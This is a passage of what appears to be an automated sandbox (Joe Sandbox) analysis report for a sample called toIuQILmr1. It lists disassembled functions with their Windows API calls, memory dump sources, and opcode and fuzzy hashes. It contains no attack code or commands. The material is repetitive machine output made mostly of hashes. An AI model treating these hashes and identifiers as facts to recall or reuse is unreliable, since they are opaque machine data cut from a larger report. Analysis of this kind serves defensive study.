                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 3489934621-2819208100
                                          • Opcode ID: 54c1f3fdb85014d971e25cd5eabff34ef79075a1a5c6c661be33d42597fb3796
                                          • Instruction ID: 6d118f0230f55c917fad405067ec087da030a497988e6c5cd5577f8b456404cf
                                          • Opcode Fuzzy Hash: 54c1f3fdb85014d971e25cd5eabff34ef79075a1a5c6c661be33d42597fb3796
                                          • Instruction Fuzzy Hash: 8CE0BFBC5827009FEB149B63FD0DF163AA4B714787F14542AF115F10F0CB744549CA18
                                          Function 00E46E17 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __WSAFDIsSet.WS2_32(00000000,?), ref: 00E46F14
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E46F48
                                          • htons.WS2_32(?), ref: 00E46FFE
                                          • inet_ntoa.WS2_32(?), ref: 00E46FBB
                                            • Part of subcall function 00E2AE14: _strlen.LIBCMT ref: 00E2AE1E
                                            • Part of subcall function 00E2AE14: _memmove.LIBCMT ref: 00E2AE40
                                          • _strlen.LIBCMT ref: 00E47058
                                          • _memmove.LIBCMT ref: 00E470C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                          • String ID:
                                          • API String ID: 3619996494-0
                                          • Opcode ID: c06c9bc2204157ebb55f23f8200f0d2396d691c43d6a863651de7359a1001c3c
                                          • Instruction ID: 1e89b2f64281f5afc0f8c2c31aa88e758feb13cc7dce9139dac1fdcfe0f4aec8
                                          • Opcode Fuzzy Hash: c06c9bc2204157ebb55f23f8200f0d2396d691c43d6a863651de7359a1001c3c
                                          • Instruction Fuzzy Hash: 9781E071108300AFC710EF24EC91F6BB7E9EF84718F14591AF555AB292DB71AD04CBA2
                                          Function 00E3675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          • Opcode ID: 040ed3faa825fe65c3412c21568763521d903e3cfb72be60eb4e581b301f4f82
                                          • Instruction ID: 220fce04883523549460980eeeae81ec66a58e16abf1f6482d96a0f3137d9f87
                                          • Opcode Fuzzy Hash: 040ed3faa825fe65c3412c21568763521d903e3cfb72be60eb4e581b301f4f82
                                          • Instruction Fuzzy Hash: FD61BC3050065AABCF11EF30CC96EFE7BA4EF48308F05955AF9596B292DB31A801CB70
                                          Function 00E5046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E50038,?,?), ref: 00E510BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50548
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E50588
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E505AB
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E505D4
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E50617
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E50624
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          • Opcode ID: 055dd09683b304d4f76daee80d8a3323c6f20dd598d0321c6ba23b909da5586a
                                          • Instruction ID: 86b069b17c76185cb8cc042175cab2eae1b525694ab9d3481e0c68fd49a86065
                                          • Opcode Fuzzy Hash: 055dd09683b304d4f76daee80d8a3323c6f20dd598d0321c6ba23b909da5586a
                                          • Instruction Fuzzy Hash: 1C513831108340AFC714EF64D885E6ABBE8FF88315F04595EF945A72A1EB71E908CB62
                                          Function 00E55A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMenu.USER32(?), ref: 00E55A82
                                          • GetMenuItemCount.USER32(00000000), ref: 00E55AB9
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E55AE1
                                          • GetMenuItemID.USER32(?,?), ref: 00E55B50
                                          • GetSubMenu.USER32(?,?), ref: 00E55B5E
                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E55BAF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostString
                                          • String ID:
                                          • API String ID: 650687236-0
                                          • Opcode ID: 3bd39c6eed9a346c2562ff2c17b969b5983608795fe2353e0bfc9809a904d172
                                          • Instruction ID: c15a50a292a7e6733b352d380ff46513866726ee50699690ab7f68359381626c
                                          • Opcode Fuzzy Hash: 3bd39c6eed9a346c2562ff2c17b969b5983608795fe2353e0bfc9809a904d172
                                          • Instruction Fuzzy Hash: 96519F32A00615EFCF14EFA4C855AAEBBB4EF48311F10585AFD11B7351CB30AE448BA0
                                          Function 00E2F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00E2F3F7
                                          • VariantClear.OLEAUT32(00000013), ref: 00E2F469
                                          • VariantClear.OLEAUT32(00000000), ref: 00E2F4C4
                                          • _memmove.LIBCMT ref: 00E2F4EE
                                          • VariantClear.OLEAUT32(?), ref: 00E2F53B
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E2F569
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          • Opcode ID: d6ec1e499c1744f8a0e98c3c02bdbfe27bb5146db3f0a89aefc63fc61bc15faf
                                          • Instruction ID: c3963f901a59e1f4afc1726c99834e8b83c70b9f73d746294532b43e39ba2898
                                          • Opcode Fuzzy Hash: d6ec1e499c1744f8a0e98c3c02bdbfe27bb5146db3f0a89aefc63fc61bc15faf
                                          • Instruction Fuzzy Hash: 4D5148B5A00219EFCB14DF58D884AAAB7B8FF4C354B158569E959EB310D730E911CFA0
                                          Function 00E326F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E32747
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E32792
                                          • IsMenu.USER32(00000000), ref: 00E327B2
                                          • CreatePopupMenu.USER32 ref: 00E327E6
                                          • GetMenuItemCount.USER32(000000FF), ref: 00E32844
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E32875
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          • Opcode ID: 912009c9f744a636dfda84238c51f166bf8058ec8d8294b94f3c6b977fc8a9ad
                                          • Instruction ID: 8b677b21b5e585b22eb35977af82b0858ad682b7429ee32ca22258254b7c7541
                                          • Opcode Fuzzy Hash: 912009c9f744a636dfda84238c51f166bf8058ec8d8294b94f3c6b977fc8a9ad
                                          • Instruction Fuzzy Hash: F8518B70A00309EFDB29CF68D88CAAEBFF4AF44318F10556DEA91BB290D7709904CB51
                                          Function 00DD1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00DD179A
                                          • GetWindowRect.USER32(?,?), ref: 00DD17FE
                                          • ScreenToClient.USER32(?,?), ref: 00DD181B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DD182C
                                          • EndPaint.USER32(?,?), ref: 00DD1876
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          • Opcode ID: 97c13b06b9de3394b3a7b3539aa46fc7f7dd5437a42edde2ac9593bc53ee3249
                                          • Instruction ID: 1a471813727675a2f894251fb1656f4440d48b7428f97630be653aeedcca38a0
                                          • Opcode Fuzzy Hash: 97c13b06b9de3394b3a7b3539aa46fc7f7dd5437a42edde2ac9593bc53ee3249
                                          • Instruction Fuzzy Hash: 58417C74204300AFD720DF26D885BBA7BF8EB49724F14066AF9A4972A1C7719849DB71
                                          Function 00E5B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(00E967B0,00000000,00F72230,?,?,00E967B0,?,00E5B862,?,?), ref: 00E5B9CC
                                          • EnableWindow.USER32(00000000,00000000), ref: 00E5B9F0
                                          • ShowWindow.USER32(00E967B0,00000000,00F72230,?,?,00E967B0,?,00E5B862,?,?), ref: 00E5BA50
                                          • ShowWindow.USER32(00000000,00000004,?,00E5B862,?,?), ref: 00E5BA62
                                          • EnableWindow.USER32(00000000,00000001), ref: 00E5BA86
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E5BAA9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: 520c381bc72f84d2c9604907ea8a610625470f0a7c7d8e0d4ba628d094278b5e
                                          • Instruction ID: 522042f4565cd1f9a88717b741e1dfb07c5c4653ae42414c269a71ca665616be
                                          • Opcode Fuzzy Hash: 520c381bc72f84d2c9604907ea8a610625470f0a7c7d8e0d4ba628d094278b5e
                                          • Instruction Fuzzy Hash: 10415030600241AFDB26CF15C489B957BE0BB4531AF1856B9FE58AF2A3C731E849CB51
                                          Function 00E473B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00E45134,?,?,00000000,00000001), ref: 00E473BF
                                            • Part of subcall function 00E43C94: GetWindowRect.USER32(?,?), ref: 00E43CA7
                                          • GetDesktopWindow.USER32 ref: 00E473E9
                                          • GetWindowRect.USER32(00000000), ref: 00E473F0
                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E47422
                                            • Part of subcall function 00E354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E3555E
                                          • GetCursorPos.USER32(?), ref: 00E4744E
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E474AC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                          • String ID:
                                          • API String ID: 4137160315-0
                                          • Opcode ID: 79074429d4474ba8f338a7251681a6d78545de9b6f216439615162a7ffa57ce9
                                          • Instruction ID: 7f66fc44885bbe3d73b013eae579066d13a42be22b415e9f3bcfdee5e7b8031e
                                          • Opcode Fuzzy Hash: 79074429d4474ba8f338a7251681a6d78545de9b6f216439615162a7ffa57ce9
                                          • Instruction Fuzzy Hash: 8931F232508305AFC724DF15D849EABBBE9FF88304F000919F499A7191DB30EA08CBD2
                                          Function 00E3ED8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                            • Part of subcall function 00DEFEC6: _wcscpy.LIBCMT ref: 00DEFEE9
                                          • _wcstok.LIBCMT ref: 00E3EEFF
                                          • _wcscpy.LIBCMT ref: 00E3EF8E
                                          • _memset.LIBCMT ref: 00E3EFC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: b30980e86937940915a2caad6fddafdbc9360d087d328cb9af126f9de0a87260
                                          • Instruction ID: ed2bb7177095aa00d1c2fc90215bceb57d2ddcc15dfde6d49f78a615b94161d2
                                          • Opcode Fuzzy Hash: b30980e86937940915a2caad6fddafdbc9360d087d328cb9af126f9de0a87260
                                          • Instruction Fuzzy Hash: 52C193315083019FC714EF24D895A6ABBE4FF84314F04596EF899A73A2DB70ED45CBA2
                                          Function 00E28D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E285F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E28608
                                            • Part of subcall function 00E285F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E28612
                                            • Part of subcall function 00E285F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E28621
                                            • Part of subcall function 00E285F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00E28628
                                            • Part of subcall function 00E285F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E2863E
                                          • GetLengthSid.ADVAPI32(?,00000000,00E28977), ref: 00E28DAC
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E28DB8
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E28DBF
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E28DD8
                                          • GetProcessHeap.KERNEL32(00000000,00000000,00E28977), ref: 00E28DEC
                                          • HeapFree.KERNEL32(00000000), ref: 00E28DF3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 169236558-0
                                          • Opcode ID: 7a2c18e9d164a38477c658a0ebba1da8bf49ad8a22805d2b04e43dd3cb8b1b77
                                          • Instruction ID: fa616326d9b414af6a3a4a092a945f4c90bccb21bed1914a0f5d385632a7d298
                                          • Opcode Fuzzy Hash: 7a2c18e9d164a38477c658a0ebba1da8bf49ad8a22805d2b04e43dd3cb8b1b77
                                          • Instruction Fuzzy Hash: B611E131902614FFDB149F65EE08BAE77ADFF5531AF108529E845B3251CB31AD08CB60
                                          Function 00E5C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DD134D
                                            • Part of subcall function 00DD12F3: SelectObject.GDI32(?,00000000), ref: 00DD135C
                                            • Part of subcall function 00DD12F3: BeginPath.GDI32(?), ref: 00DD1373
                                            • Part of subcall function 00DD12F3: SelectObject.GDI32(?,00000000), ref: 00DD139C
                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E5C1C4
                                          • LineTo.GDI32(00000000,00000003,?), ref: 00E5C1D8
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E5C1E6
                                          • LineTo.GDI32(00000000,00000000,?), ref: 00E5C1F6
                                          • EndPath.GDI32(00000000), ref: 00E5C206
                                          • StrokePath.GDI32(00000000), ref: 00E5C216
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          • Opcode ID: 6063345c2dc27d45f1ae019ecaeb10219c10e145abed193aaffbe791eae0735a
                                          • Instruction ID: 0af4a425e6e1d91737cc519b2d2573b2b35ff32e2864ad857930b302ce41da76
                                          • Opcode Fuzzy Hash: 6063345c2dc27d45f1ae019ecaeb10219c10e145abed193aaffbe791eae0735a
                                          • Instruction Fuzzy Hash: 54111E7640020CBFDF119F91DC48E9A7FADEB04355F048422FA18661A1D7729D59DBA0
                                          Function 00DF03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DF03D3
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00DF03DB
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DF03E6
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DF03F1
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00DF03F9
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DF0401
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
